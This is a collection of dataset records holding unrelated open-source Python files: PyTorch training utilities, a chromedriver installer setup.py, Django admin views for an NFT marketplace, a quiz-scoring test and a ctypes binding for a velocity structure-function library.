\\\n float(max(1, num_training_steps - num_warmup_steps - num_wait_steps))\n return max(0.0, 0.5 * (1.0 + math.cos(math.pi * float(num_cycles) * 2.0 * progress)))\n\n return LambdaLR(optimizer, lr_lambda, last_epoch)\n\ndef get_lr(optimizer):\n return optimizer.param_groups[0]['lr']\n\n\ndef split_weights(net):\n \"\"\"split network weights into to categlories,\n one are weights in conv layer and linear layer,\n others are other learnable paramters(conv bias,\n bn weights, bn bias, linear bias)\n Args:\n net: network architecture\n\n Returns:\n a dictionary of params splite into to categlories\n \"\"\"\n\n decay = []\n no_decay = []\n\n for m in net.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n decay.append(m.weight)\n\n if m.bias is not None:\n no_decay.append(m.bias)\n\n else:\n if hasattr(m, 'weight'):\n no_decay.append(m.weight)\n if hasattr(m, 'bias'):\n no_decay.append(m.bias)\n\n assert len(list(net.parameters())) == len(decay) + len(no_decay)\n\n return [dict(params=decay), dict(params=no_decay, weight_decay=0)]\n\ndef lower_fc(net, lr):\n normal = []\n slower = []\n for k,v in net.named_parameters():\n if 'fc' in k:\n slower.append(v)\n else:\n normal.append(v)\n\n assert len(list(net.parameters())) == len(normal) + len(slower)\n return [dict(params=normal), dict(params=slower, lr=lr/10)]\n\nclass ProgressMeter(object):\n def __init__(self, num_batches, meters, prefix=\"\"):\n self.batch_fmtstr = self._get_batch_fmtstr(num_batches)\n self.meters = meters\n self.prefix = prefix\n\n def display(self, batch):\n entries = [self.prefix + self.batch_fmtstr.format(batch)]\n entries += [str(meter) for meter in self.meters]\n # print('\\t'.join(entries))\n print('\\t'.join(entries))\n\n def _get_batch_fmtstr(self, num_batches):\n num_digits = len(str(num_batches // 1))\n fmt = '{:' + str(num_digits) + 'd}'\n return '[' + fmt + '/' + fmt.format(num_batches) + ']'\n\n\ndef _no_grad_trunc_normal_(tensor, mean, std, a, b):\n # Cut & paste from PyTorch official master until it's in a few official releases - RW\n # Method based on https://people.sc.fsu.edu/~jburkardt/presentations/truncated_normal.pdf\n def norm_cdf(x):\n # Computes standard normal cumulative distribution 
function\n return (1. + math.erf(x / math.sqrt(2.))) / 2.\n\n if (mean < a - 2 * std) or (mean > b + 2 * std):\n warnings.warn(\"mean is more than 2 std from [a, b] in nn.init.trunc_normal_. \"\n \"The distribution of values may be incorrect.\",\n stacklevel=2)\n\n with torch.no_grad():\n # Values are generated by using a truncated uniform distribution and\n # then using the inverse CDF for the normal distribution.\n # Get upper and lower cdf values\n l = norm_cdf((a - mean) / std)\n u = norm_cdf((b - mean) / std)\n\n # Uniformly fill tensor with values from [l, u], then translate to\n # [2l-1, 2u-1].\n tensor.uniform_(2 * l - 1, 2 * u - 1)\n\n # Use inverse cdf transform for normal distribution to get truncated\n # standard normal\n tensor.erfinv_()\n\n # Transform to proper mean, std\n tensor.mul_(std * math.sqrt(2.))\n tensor.add_(mean)\n\n # Clamp to ensure it's in the proper range\n tensor.clamp_(min=a, max=b)\n return tensor\n\n\ndef trunc_normal_(tensor, mean=0., std=1., a=-2., b=2.):\n # type: (Tensor, float, float, float, float) -> Tensor\n return _no_grad_trunc_normal_(tensor, mean, std, a, b)\n\ndef clip_gradients(model, clip):\n norms = []\n for name, p in model.named_parameters():\n if p.grad is not None:\n param_norm = p.grad.data.norm(2)\n norms.append(param_norm.item())\n clip_coef = clip / (param_norm + 1e-6)\n if clip_coef < 1:\n p.grad.data.mul_(clip_coef)\n return norms\n\ndef cancel_gradients_last_layer(epoch, model, freeze_last_layer):\n if epoch >= freeze_last_layer:\n return\n for n, p in model.named_parameters():\n if \"last_layer\" in n:\n p.grad = None\n\ndef cosine_scheduler(base_value, final_value, epochs, niter_per_ep, warmup_epochs=0, start_warmup_value=0):\n warmup_schedule = np.array([])\n warmup_iters = warmup_epochs * niter_per_ep\n if warmup_epochs > 0:\n warmup_schedule = np.linspace(start_warmup_value, base_value, warmup_iters)\n\n iters = np.arange(epochs * niter_per_ep - warmup_iters)\n schedule = final_value + 0.5 * (base_value - final_value) * (1 + np.cos(np.pi * iters / len(iters)))\n\n schedule = np.concatenate((warmup_schedule, schedule))\n assert len(schedule) == epochs * niter_per_ep\n return schedule\n\ndef get_params_groups(model):\n regularized = []\n not_regularized = []\n for name, param in model.named_parameters():\n if not param.requires_grad:\n continue\n # we do not regularize biases nor Norm parameters\n if name.endswith(\".bias\") or len(param.shape) == 1:\n not_regularized.append(param)\n else:\n regularized.append(param)\n return [{'params': regularized}, {'params': not_regularized, 'weight_decay': 0.}]\n\ndef gen_adv(model, x, criterion, indexes,eps):\n x_adv = Variable(x, requires_grad=True).cuda\n adv_feat = model(x_adv, adv=True)\n clean_feat = model(x, adv=True)\n features = torch.cat((clean_feat, adv_feat), 0)\n tmp_loss = criterion(features, indexes)\n tmp_loss.backward()\n # generate adversarial example\n x_adv.data = x_adv.data + (eps * torch.sign(x_adv.grad.data))\n x_adv.grad.data.zero_()\n x_adv.requires_grad = False\n return x_adv\n","repo_name":"tualgfhite/Contrastive-Learning","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32960283632","text":"from setuptools import setup\n\nwith open(\"README.md\", \"r\") as arq:\n readme = arq.read()\n\nsetup(\n name='easy_chromedriver_windows_install',\n version='0.0.2',\n license='MIT License',\n author='Luan Grabher',\n 
long_description=readme,\n long_description_content_type=\"text/markdown\",\n author_email='luanggcontato@gmail.com',\n keywords='chromedriver selenium webdriver',\n description=u'Download chromedriver easily on Windows',\n packages=['easy_chromedriver_windows_install'],\n install_requires=['requests']\n)","repo_name":"luan-grabher/easy-chromedriver-windows-install","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6562875029","text":"from accounts.models import User\nfrom admin_panel.collection_app.filters import CollectionFilter, CategoryFilter, FavouriteNftFilter, ReportedNftFilter, \\\n nphFilter, nftFilter\nfrom admin_panel.collection_app.forms import CategoryForm\nfrom apis.nft_management.models import Collection, Category, FavouriteNft, ReportedNft, Nft, NftPriceHistory\nfrom django.contrib import messages\nfrom django.core.paginator import Paginator\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse, reverse_lazy\nfrom django.views import View\nfrom django.views.generic import UpdateView, DeleteView, ListView\n\n\n# Create your views here.\nclass ListCollectionView(View):\n \"\"\"\n **ListCollectionView class**\n\n This view used to perform get request on Collection object to view the list of collection object\n\n **Parameters**\n\n `View:` django.views\n\n \"\"\"\n\n def get(self, request):\n \"\"\"\n Http get request use to Render create_collection template, categories and users.\n\n **Template:**\n\n `template:` admin_site/list-collection.html\n\n **Returns:**\n\n `render:` list-collection template and collection list\n\n \"\"\"\n message = request.GET.get('message', None)\n collection_list = Collection.objects.all()\n filter_collection = CollectionFilter(request.GET, collection_list)\n collection_list = filter_collection.qs\n p = Paginator(collection_list.order_by('id'), 5)\n page = request.GET.get('page')\n obj = p.get_page(page)\n return render(request, 'list_collection.html', {\n 'collection_list': collection_list,\n \"filter\": filter_collection,\n 'obj': obj,\n 'message': message\n })\n\n\nclass SpecificDeleteCollection(View):\n\n def get(self, request, id, col_id):\n nft_obj = Nft.objects.get(id=id)\n nft_obj.delete()\n url = reverse(f'nft_management:detail-collection', kwargs={'id': col_id})\n url += \"?message=Delete-Successfully/\"\n return HttpResponseRedirect(url)\n\n\nclass DetailCollectionView(View):\n\n def get(self, request, id):\n collection_obj = Collection.objects.filter(id=id).first()\n message = request.GET.get('message', None)\n nft_obj = Nft.objects.filter(collection=id)\n myfilter = nftFilter(request.GET, queryset=nft_obj)\n nft_obj = myfilter.qs\n p = Paginator(nft_obj.order_by('id'), 5)\n page = request.GET.get('page')\n obj = p.get_page(page)\n return render(request, 'view_collection.html', context={\n 'collection_obj': collection_obj,\n 'nft': nft_obj,\n 'myfilter': myfilter,\n 'obj': obj,\n 'message': message\n })\n\n\nclass DeleteCollectionView(View):\n \"\"\"\n **DeleteCollectionView class**\n\n This view used to perform get request on Collection object to delete the Collection object\n\n **Parameters**\n\n `View:` django.views\n\n \"\"\"\n\n def get(self, request, id):\n \"\"\"\n Http get request use to Render list collection template after soft delete the collection.\n\n **Template:**\n\n `template:` 
admin_site/list-collection.html\n\n **Returns:**\n\n `HttpResponseRedirect:` collection list template\n\n \"\"\"\n collection_object = Collection.objects.get(id=id)\n nft_objects = Nft.objects.filter(collection=id)\n for nft in nft_objects:\n nft.delete()\n collection_object.delete()\n url = reverse('nft_management:list-collection')\n url += \"?message=Delete-Successfully/\"\n return HttpResponseRedirect(url)\n\n\nclass CreateCategoryView(View):\n \"\"\"\n **CreateCategoryView class**\n\n This view used to perform get and post request on Category object to create the Category object\n\n **Parameters**\n\n `View` : django.views\n\n \"\"\"\n\n def post(self, request):\n \"\"\"\n Http get request use to Render create_category template and categories list\n\n **Template:**\n\n `success-template:` admin_site/create-category.html\n\n **Returns:**\n\n ``render`` : `create category template, category list`\n\n \"\"\"\n try:\n name = request.POST.get('name')\n category_obj = Category(name=name, is_active=True)\n category_obj.save()\n url = reverse('nft_management:list-category')\n url += \"?message=Created-Successfully/\"\n return HttpResponseRedirect(url)\n except Exception as e:\n url = reverse('nft_management:list-category')\n url += \"?message=Already-Exist/\"\n return HttpResponseRedirect(url)\n\n\nclass ListCategoryView(View):\n \"\"\"\n **ListCategoryView class**\n\n This view used to perform get request on category object to view the list of categories object\n\n **Parameters**\n\n `View:` django.views\n\n \"\"\"\n\n def get(self, request):\n \"\"\"\n Http get request use to Render create_category template and category list\n\n **Template:**\n\n `template:` admin_site/list-collection.html\n\n **Returns:**\n\n `render:` list-category template and category list\n\n \"\"\"\n message = request.GET.get('message', None)\n print(message)\n category_list = Category.objects.filter(is_removed=False)\n filter_category = CategoryFilter(request.GET, category_list)\n category_list = filter_category.qs\n p = Paginator(category_list.order_by('id'), 5)\n page = request.GET.get('page')\n obj = p.get_page(page)\n return render(request, 'list_category.html', {\n 'category_list': category_list,\n \"filter\": filter_category,\n 'obj': obj,\n 'message': message\n })\n\n\nclass DeleteCategoryView(View):\n \"\"\"\n **DeleteCategoryView class**\n\n This view used to perform get request on Category object to delete the Category object\n\n **Parameters**\n\n `View:` django.views\n\n \"\"\"\n\n def get(self, request, id):\n \"\"\"\n Http get request use to Render list category template after soft delete the category.\n\n **Template:**\n\n `template:` admin_site/list-category.html\n\n **Returns:**\n\n `HttpResponseRedirect:` category list template\n\n \"\"\"\n category_object = Category.objects.get(id=id)\n category_object.delete()\n url = reverse('nft_management:list-category')\n url += \"?message=Delete-Successfully/\"\n return HttpResponseRedirect(url)\n\n\nclass UpdateCategoryView(View):\n \"\"\"\n *UpdateCategoryView class*\n\n This view used to perform get and post request on Category object to update the Collection object\n\n *Parameters*\n\n `View:` django.views\n\n \"\"\"\n\n def post(self, request, id):\n \"\"\"\n Http post request use to Update an individual Collection object.\n\n *Template:*\n\n `success-template:` collection_app/list-collection.html\n\n `un-success-template:` collection_app/update-collection.html\n\n *Returns:*\n\n `HttpResponseRedirect` : 'if form is valid'\n\n `else` : render 'update 
collection template and objects used in collection creation'\n \"\"\"\n try:\n category_object = Category.objects.get(pk=id)\n category_object.name = request.POST.get('name')\n is_active = False\n if request.POST.get('is_active_2'):\n is_active = True\n category_object.is_active = is_active\n category_object.save()\n url = reverse('nft_management:list-category')\n url += \"?message=Updated-Successfully/\"\n return HttpResponseRedirect(url)\n except Exception as e:\n url = reverse('nft_management:list-category')\n url += \"?message=Already-Exist/\"\n return HttpResponseRedirect(url)\n\n\nclass ListFavoritesNFTView(View):\n \"\"\"\n **ListCollectionView class**\n\n This view used to perform get request on Collection object\n to view the list of collection object\n\n **Parameters**\n\n `View:` django.views\n\n \"\"\"\n\n def get(self, request):\n \"\"\"\n Http get request use to Render create_collection template, categories and users.\n\n **Template:**\n\n `template:` admin_site/list-collection.html\n\n **Returns:**\n\n `render:` list-collection template and collection list\n\n \"\"\"\n favorites_nft_list = FavouriteNft.objects.all()\n filter_favorites_nft = FavouriteNftFilter(request.GET, favorites_nft_list)\n favorites_nft_list = filter_favorites_nft.qs\n p = Paginator(favorites_nft_list.order_by('id'), 5)\n page = request.GET.get('page')\n obj = p.get_page(page)\n return render(request, 'list_favorites_nft.html', {\n 'favorites_nft_list': favorites_nft_list,\n \"filter\": filter_favorites_nft,\n 'obj': obj\n })\n\n\nclass DeleteFavoritesNFTView(View):\n \"\"\"\n **DeleteCategoryView class**\n\n This view used to perform get request on Category object to delete the Category object\n\n **Parameters**\n\n `View:` django.views\n\n \"\"\"\n\n def get(self, request, id):\n \"\"\"\n Http get request use to Render list category template after soft delete the category.\n\n **Template:**\n\n `template:` admin_site/list-category.html\n\n **Returns:**\n\n `HttpResponseRedirect:` category list template\n\n \"\"\"\n favorites_nft_object = FavouriteNft.objects.get(id=id)\n favorites_nft_object.is_removed = True\n favorites_nft_object.save()\n url = reverse('nft_management:list-favorites-nft')\n return HttpResponseRedirect(url)\n\n\nclass ListReportedNFTView(View):\n \"\"\"\n **ListCollectionView class**\n\n This view used to perform get request on Collection object\n to view the list of collection object\n\n **Parameters**\n\n `View:` django.views\n\n \"\"\"\n\n def get(self, request):\n \"\"\"\n Http get request use to Render create_collection template, categories and users.\n\n **Template:**\n\n `template:` admin_site/list-collection.html\n\n **Returns:**\n\n `render:` list-collection template and collection list\n\n \"\"\"\n reported_nft_list = ReportedNft.objects.all()\n filter_reported_nft = ReportedNftFilter(request.GET, reported_nft_list)\n reported_nft_list = filter_reported_nft.qs\n p = Paginator(reported_nft_list.order_by('id'), 5)\n page = request.GET.get('page')\n obj = p.get_page(page)\n\n return render(request, 'list_reported_nft.html', {\n 'reported_nft_list': reported_nft_list,\n \"filter\": filter_reported_nft,\n 'obj': obj,\n })\n\n\nclass ResolveReportedNFTView(View):\n \"\"\"\n **DeleteCategoryView class**\n\n This view used to perform get request on Category object to delete the Category object\n\n **Parameters**\n\n `View:` django.views\n\n \"\"\"\n\n def get(self, request, id):\n \"\"\"\n Http get request use to Render list category template after soft delete the category.\n\n 
**Template:**\n\n `template:` admin_site/list-category.html\n\n **Returns:**\n\n `HttpResponseRedirect:` category list template\n\n \"\"\"\n reported_nft_object = ReportedNft.objects.get(id=id)\n reported_nft_object.delete()\n messages.success(request,'Reported Nft : Resolved Successfully')\n url = reverse('nft_management:list-reported-nft')\n\n return HttpResponseRedirect(url)\n\n\nclass NftListDisplay(View):\n model = Nft\n template_name = \"nft-list.html\"\n\n # template_name += \"?message=Delete-Successfully/\"\n\n def get(self, request):\n \"\"\"\n Http get request use to Render create_collection template, categories and users.\n\n *Template:*\n\n\n `template:` collection_app/list-collection.html\n\n *Returns:*\n\n\n `render:` list-collection template and collection list\n\n \"\"\"\n message = request.GET.get('message', None)\n\n nfts = Nft.objects.all().order_by('id')\n myfilter = nftFilter(request.GET, queryset=nfts)\n nftis = myfilter.qs\n p = Paginator(nftis.order_by('id'), 5)\n page = request.GET.get('page')\n obj = p.get_page(page)\n return render(request, 'nft-list.html', {'nftis': nftis, 'myfilter': myfilter, 'obj': obj, 'message': message})\n\n\nclass NftUpdate(UpdateView):\n model = Nft\n fields = \"__all__\"\n template_name = \"update_nft.html\"\n\n def get_context_data(self, **kwargs):\n collection_obj = Collection.objects.all()\n user_obj = User.objects.all()\n context = super().get_context_data(**kwargs)\n context[\"collection_obj\"] = collection_obj\n context[\"user_obj\"] = user_obj\n\n return context\n\n\nclass NftCreate(View):\n model = Nft\n fields = \"__all__\"\n template_name = \"create_nft.html\"\n\n def get(self, request):\n collection_obj = Collection.objects.all()\n user_obj = User.objects.all()\n nft_obj = Nft.objects.all()\n context = {\n \"collection_obj\": collection_obj,\n \"user_obj\": user_obj,\n \"nft_obj\": nft_obj,\n }\n return render(request, \"create_nft.html\", context)\n\n def post(self, request):\n data = request.POST\n name = data[\"name\"]\n description = data[\"description\"]\n image = data[\"image\"]\n royalty = data[\"royalty\"]\n size = data[\"size\"]\n no_of_copies = data[\"no_of_copies\"]\n total_views = data[\"total_views\"]\n sale_type = data[\"sale_type\"]\n price = data[\"price\"]\n collection = Collection.objects.get(id=int(data[\"collection\"]))\n owner = User.objects.get(id=int(data[\"owner\"]))\n\n nft = Nft(\n name=name,\n description=description,\n image=image,\n royalty=royalty,\n size=size,\n no_of_copies=no_of_copies,\n is_hidden=True,\n collection=collection,\n owner=owner,\n sale_type=sale_type,\n price=price,\n )\n nft.save()\n return redirect(\"nft_management:nfts_list\")\n\n\nclass NftDelete(View):\n \"\"\"\n *DeleteCategoryView class*\n\n This view used to perform get request on Category object to delete the Category object\n\n *Parameters*\n\n `View:` django.views\n\n \"\"\"\n\n def get(self, request, pk):\n \"\"\"\n Http get request use to Render list category template after soft delete the category.\n\n *Template:*\n\n `template:` admin_site/list-category.html\n\n *Returns:*\n\n `HttpResponseRedirect:` category list template\n\n \"\"\"\n nft_object = Nft.objects.get(pk=pk)\n # nft_object.is_removed = True\n # nft_object.save()\n nft_object.delete()\n url = reverse('nft_management:nfts_list')\n url += \"?message=Delete-Successfully/\"\n\n return HttpResponseRedirect(url)\n\n\nclass AddNftPriceHistory(View):\n model = NftPriceHistory\n templated_name = \"nftprice_add.html\"\n fields = \"__all__\"\n\n def get(self, 
request):\n nft_obj = Nft.objects.all()\n context = {\"nft_obj\": nft_obj}\n return render(request, \"nftprice_add.html\", context)\n\n def post(self, request):\n data = request.POST\n price = data[\"price\"]\n is_active = request.POST.get(\"is_active\", False)\n date = data[\"date\"]\n nft = Nft.objects.get(id=int(data[\"nft\"]))\n nft = Nft(is_active=is_active, nft=nft, date=date, price=price)\n nft.save()\n return HttpResponseRedirect(\"nft_management:price-history-list\")\n\n\nclass DeletePriceHistory(DeleteView):\n model = NftPriceHistory\n template_name = \"nftprice_delete.html\"\n fields = \"__all__\"\n success_url = reverse_lazy(\"nft_management:price-history-list\")\n\n\nclass PriceHistoryList(ListView):\n def get(self, request):\n \"\"\"\n Http get request use to Render create_collection template, categories and users.\n\n *Template:*\n\n\n `template:` collection_app/list-collection.html\n\n *Returns:*\n\n\n `render:` list-collection template and collection list\n\n \"\"\"\n nfts = NftPriceHistory.objects.all().order_by('id')\n myfilter = nphFilter(request.GET, queryset=nfts)\n npriceh = myfilter.qs\n p = Paginator(npriceh.order_by('id'), 5)\n page = request.GET.get('page')\n obj = p.get_page(page)\n return render(request, 'nftprice_list.html', {'npricehs': npriceh, 'myfilter': myfilter, 'obj': obj})\n\n\nclass UpdateHistoryList(UpdateView):\n model = NftPriceHistory\n templated_name = \"nftprice_list.html\"\n fields = \"__all__\"\n success_url = reverse_lazy(\"nft_management:nfts_list\")\n\n\nclass NftDetailView(View):\n \"\"\"\n *Nft Detail class*\n\n This view used to perform get request on profile object to view the list of Nft\n\n *Parameters*\n\n `View:` django.viewsgit\n\n \"\"\"\n\n def get(self, request, id):\n \"\"\"\n Http get request use to Render profiles template\n\n *Template:*\n\n `template:` admin_user/profiles.html\n\n *Returns:*\n\n `render:` profile template and user list\n\n \"\"\"\n try:\n nft = Nft.objects.get(id=id)\n bids = nft.bidding_nft.all().order_by('id')\n p = Paginator(bids.order_by('id'), 5)\n page = request.GET.get('page',)\n obj = p.get_page(page)\n\n return render(request, 'nft_detail.html', {'nft': nft, 'bids': bids,'obj':obj})\n except Exception as e:\n return \"Nft Doesn not Exist\"\n\n\nclass LiveAuctionView(ListView):\n model = Nft\n fields = \"__all__\"\n template_name = 'live_auction.html'\n\n def get(self, request):\n \"\"\"\n Http get request use to Render create_collection template, categories and users.\n\n *Template:*\n\n\n `template:` collection_app/list-collection.html\n\n *Returns:*\n\n\n `render:` list-collection template and collection list\n\n \"\"\"\n nft = Nft.objects.all().order_by('id')\n myfilter = nftFilter(request.GET, queryset=nft)\n nftis = myfilter.qs\n p = Paginator(nftis.order_by('id'), 5)\n page = request.GET.get('page')\n obj = p.get_page(page)\n return render(request, 'live_auction.html', {'nftis': nftis, 'myfilter': myfilter, 'obj': obj})\n\n\nclass ReportedNFTView(View):\n \"\"\"\n *ListCollectionView class*\n\n This view used to perform get request on Collection object\n to view the list of collection object\n\n *Parameters*\n\n `View:` django.views\n\n \"\"\"\n\n def get(self, request):\n \"\"\"\n Http get request use to Render create_collection template, categories and users.\n\n *Template:*\n\n `template:` admin_site/list-collection.html\n\n *Returns:*\n\n `render:` list-collection template and collection list\n\n \"\"\"\n reported_nft_list = ReportedNft.objects.get(id=id)\n return render(request, 
'reported_nft_view.html', {\n 'reported_nft_list': reported_nft_list\n })","repo_name":"HaseebBajwa12/NFT-MarketPlace","sub_path":"admin_panel/collection_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":19195,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"14336396748","text":"import pytest\nfrom quiz.utils import score_test_attempt\n\npytestmark = pytest.mark.django_db\n\ndef test_score_quiz_attempt(question_factory, answer_factory, quiz_factory, user_factory):\n quiz = quiz_factory(created_by = user_factory())\n \n q1 = question_factory(quiz = quiz)\n q1_correct_answer = answer_factory(question = q1, is_correct = True)\n \n q2 = question_factory(quiz = quiz)\n q2_correct_answer = answer_factory(question = q2, is_correct = True)\n \n q3 = question_factory(quiz = quiz)\n q3_correct_answer = answer_factory(question = q3, is_correct = True)\n \n q4 = question_factory(quiz = quiz)\n q4_correct_answer = answer_factory(question = q4, is_correct = True)\n \n random_answers = answer_factory.create_batch(5, question=q1)\n data ={\n \"submissions\":\n [\n {\n \"question\": q1,\n \"answer\":random_answers[0]\n },\n {\n \"question\": q2,\n \"answer\": random_answers[0]\n },\n {\n \"question\": q3,\n \"answer\": q3_correct_answer\n },\n {\n \"question\": q4,\n \"answer\": q4_correct_answer\n }\n ]\n }\n \n result: dict = score_test_attempt(4, data) \n assert result.get('score') == 2\n assert result.get('score_percent') == 50.0\n assert result.get('total_question') == 4\n ","repo_name":"ridwanray/LMS-Django","sub_path":"app/quiz/tests/test_quiz_utils.py","file_name":"test_quiz_utils.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72545931362","text":"from collections import OrderedDict\nfrom collections.abc import Sequence\nimport ctypes\nimport os.path\n\n\nimport numpy as np\n\nfrom ._kernels import get_kernel\nfrom ._kernels_cy import _verify_bin_edges\n\n# get the directory of the current file \n_dir_of_cur_file = os.path.dirname(os.path.abspath(__file__))\n# get the expected location of the shared library\n_lib_path = os.path.join(_dir_of_cur_file, '../src/libvsf.so')\n\n# confirm that the shared library exists\nif not os.path.isfile(_lib_path):\n raise RuntimeError(f\"libvsf.so wasn't found at: '{_lib_path}'\")\n\n# now actually load in the shared library\n_lib = ctypes.CDLL(_lib_path)\n\n_double_ptr = ctypes.POINTER(ctypes.c_double)\n\nclass POINTPROPS(ctypes.Structure):\n _fields_ = [(\"positions\", _double_ptr),\n (\"velocities\", _double_ptr),\n (\"n_points\", ctypes.c_size_t),\n (\"n_spatial_dims\", ctypes.c_size_t),\n (\"spatial_dim_stride\", ctypes.c_size_t),\n ]\n\n @staticmethod\n def construct(pos, vel, dtype = np.float64, allow_null_pair = False):\n if allow_null_pair and (pos is None) and (vel is None):\n return POINTPROPS(None, None, n_points = 0, n_spatial_dims = 0,\n spatial_dim_stride = 0)\n elif (pos is None) or (vel is None):\n raise ValueError(\"pos and vel must not be None\")\n\n pos_arr = np.asarray(pos, dtype = dtype, order = 'C')\n vel_arr = np.asarray(vel, dtype = dtype, order = 'C')\n assert pos_arr.ndim == 2\n assert vel_arr.ndim == 2\n\n # I believe this is a redundant check:\n assert pos_arr.strides[1] == pos_arr.itemsize\n assert vel_arr.strides[1] == vel_arr.itemsize\n\n assert pos_arr.shape == vel_arr.shape\n n_spatial_dims = int(pos_arr.shape[0])\n n_points = 
int(pos_arr.shape[1])\n\n # in the future, consider relaxing the following condition (to\n # facillitate better data alignment)\n assert pos_arr.strides[0] == (n_points * pos_arr.itemsize)\n assert vel_arr.strides[0] == (n_points * vel_arr.itemsize)\n spatial_dim_stride = int(n_points)\n\n return POINTPROPS(positions = pos_arr.ctypes.data_as(_double_ptr),\n velocities = vel_arr.ctypes.data_as(_double_ptr),\n n_points = n_points,\n n_spatial_dims = n_spatial_dims,\n spatial_dim_stride = spatial_dim_stride)\n\nclass STATLISTITEM(ctypes.Structure):\n _fields_ = [(\"statistic\", ctypes.c_char_p),\n (\"arg_ptr\", ctypes.c_void_p)]\n\n_STATLISTITEM_ptr = ctypes.POINTER(STATLISTITEM)\n\nclass StatList:\n MAX_CAPACITY = 4\n STATLISTITEM_ArrayType = STATLISTITEM * 4\n\n def __init__(self):\n self.capacity = self.MAX_CAPACITY\n self.length = 0\n self._data = self.STATLISTITEM_ArrayType()\n for i in range(self.capacity):\n self._data[i].statistic = ctypes.c_char_p(None)\n self._data[i].arg_ptr = ctypes.c_void_p(None)\n\n self._attached_objects = []\n\n def _attach_object(self, obj):\n \"\"\"\n Store a reference to obj.\n\n This is a crude approach for making sure that arbitrary objects have \n lifetimes that are at least as long as that of self\n \"\"\"\n if obj not in self._attached_objects:\n self._attached_objects.append(obj)\n\n def append(self,statistic_name_ptr, arg_struct_ptr = None):\n assert (self.length + 1) <= self.capacity\n new_ind = self.length\n self.length+=1\n\n if isinstance(statistic_name_ptr, ctypes.Array):\n self._attach_object(statistic_name_ptr) # extra safety\n self._data[new_ind].statistic = ctypes.cast(statistic_name_ptr,\n ctypes.c_char_p)\n else:\n self._data[new_ind].statistic = statistic_name_ptr\n\n if arg_struct_ptr is None:\n self._data[new_ind].arg_ptr = ctypes.c_void_p(None)\n else:\n self._data[new_ind].arg_ptr = arg_struct_ptr\n\n def __len__(self):\n return self.length\n\n def get_STATLISTITEM_ptr(self):\n return ctypes.cast(self._data, _STATLISTITEM_ptr)\n\n def __str__(self):\n elements = []\n for i in range(self.length):\n elements.append('{' + str(self._data[i].statistic) + ',' +\n str(self._data[i].arg_ptr) + '}')\n return '[' + ','.join(elements) + ']'\n\nclass HISTBINS(ctypes.Structure):\n _fields_ = [(\"bin_edges\", _double_ptr),\n (\"n_bins\", ctypes.c_size_t)]\n\n @staticmethod\n def construct(bin_edges, arg_name = None):\n bin_edges = np.asarray(bin_edges, dtype = np.float64, order = 'C')\n assert _verify_bin_edges(bin_edges)\n n_bins = int(bin_edges.size - 1)\n\n return HISTBINS(bin_edges = bin_edges.ctypes.data_as(_double_ptr),\n n_bins = n_bins)\n_HISTBINS_ptr = ctypes.POINTER(HISTBINS)\n\nclass PARALLELSPEC(ctypes.Structure):\n _fields_ = [(\"nproc\", ctypes.c_size_t),\n (\"force_sequential\", ctypes.c_bool)]\n\n_ptr_to_double_ptr = ctypes.POINTER(_double_ptr)\n\n# define the argument types\n_lib.calc_vsf_props.argtypes = [\n POINTPROPS, POINTPROPS,\n _STATLISTITEM_ptr, ctypes.c_size_t,\n np.ctypeslib.ndpointer(dtype = np.float64, ndim = 1,\n flags = 'C_CONTIGUOUS'),\n ctypes.c_size_t,\n PARALLELSPEC,\n np.ctypeslib.ndpointer(dtype = np.float64, ndim = 1,\n flags = ['C_CONTIGUOUS', 'WRITEABLE']),\n np.ctypeslib.ndpointer(dtype = np.int64, ndim = 1,\n flags = ['C_CONTIGUOUS', 'WRITEABLE'])\n]\n_lib.calc_vsf_props.restype = ctypes.c_bool\n\n\nclass VSFPropsRsltContainer:\n def __init__(self, int64_quans, float64_quans):\n duplicates = set(int64_quans.keys()).intersection(float64_quans.keys())\n assert len(duplicates) == 0\n\n def 
_parse_input_dict(input_dict):\n total_length = 0\n access_dict = {}\n for key, subarr_shape in input_dict.items():\n subarr_size = np.prod(subarr_shape)\n subarr_idx = slice(total_length, total_length + subarr_size)\n access_dict[key] = (subarr_idx, subarr_shape)\n total_length += subarr_size\n return access_dict, total_length\n\n self.int64_access_dict, int64_len = _parse_input_dict(int64_quans)\n self.float64_access_dict, float64_len = _parse_input_dict(float64_quans)\n\n self.int64_arr = np.empty((int64_len,), dtype = np.int64 )\n self.float64_arr = np.empty((float64_len,), dtype = np.float64)\n\n @staticmethod\n def _get(key, access_dict, arr):\n idx, out_shape = access_dict[key]\n out = arr[idx]\n out.shape = out_shape # ensures we don't make a copy\n return out\n\n def __getitem__(self,key):\n try:\n return self._get(key, self.float64_access_dict, self.float64_arr)\n except KeyError:\n try:\n return self._get(key, self.int64_access_dict, self.int64_arr)\n except KeyError:\n raise KeyError(key) from None\n\n def extract_statistic_dict(self, statistic_name):\n out = {}\n\n def _extract(access_dict, arr):\n for (stat,quan), v in access_dict.items():\n if stat == statistic_name:\n out[quan] = self._get((stat,quan), access_dict, arr)\n\n _extract(self.int64_access_dict, self.int64_arr )\n _extract(self.float64_access_dict, self.float64_arr)\n\n if len(out) == 0:\n raise ValueError(f\"there's no statistic called '{statistic_name}'\")\n return out\n\n def get_flt_vals_arr(self):\n return self.float64_arr\n\n def get_i64_vals_arr(self):\n return self.int64_arr\n\ndef _process_statistic_args(stat_kw_pairs, dist_bin_edges):\n \"\"\"\n Construct the appropriate instance of StatList as well as information about\n the output data\n \"\"\"\n\n # it's important that we retain order!\n int64_quans = OrderedDict()\n float64_quans = OrderedDict()\n\n stat_list = StatList()\n\n # it's important that we consider the entries of stat_kw_pairs in\n # alphabetical order of the statistic names so that the stat_list entries\n # are also initialized in alphabetical order\n for stat_name, stat_kw in sorted(stat_kw_pairs, key = lambda pair: pair[0]):\n # load kernel object, which stores metadata\n kernel = get_kernel(stat_name)\n if kernel.non_vsf_func is not None:\n raise 